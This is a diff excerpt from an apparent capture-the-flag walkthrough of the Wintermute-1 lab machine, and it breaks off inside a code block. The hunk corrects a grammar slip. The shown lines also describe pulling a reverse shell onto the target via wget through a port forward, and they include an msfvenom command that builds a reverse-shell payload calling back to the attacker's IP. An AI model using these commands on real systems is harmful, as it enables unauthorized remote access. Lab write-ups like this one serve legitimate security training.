limbernie/limbernie.github.io/_posts/2018-09-17-wintermute-1-walkthrough.md

 Well, we can always execute `wget` to pull a reverse shell straight to Neuromancer.
 I can set up a Python SimpleHTTPServer listening at `4321/tcp` on my attacking machine.
 And because of the port forwarding, any `wget` request executed on Neuromancer to Straylight at `4321/tcp` gets to me.

-`msfvenom` can generates the reverse shell like so.
+`msfvenom` can generate the reverse shell like so.

 ```
 # msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.40.128 LPORT=4321 -f elf -o rev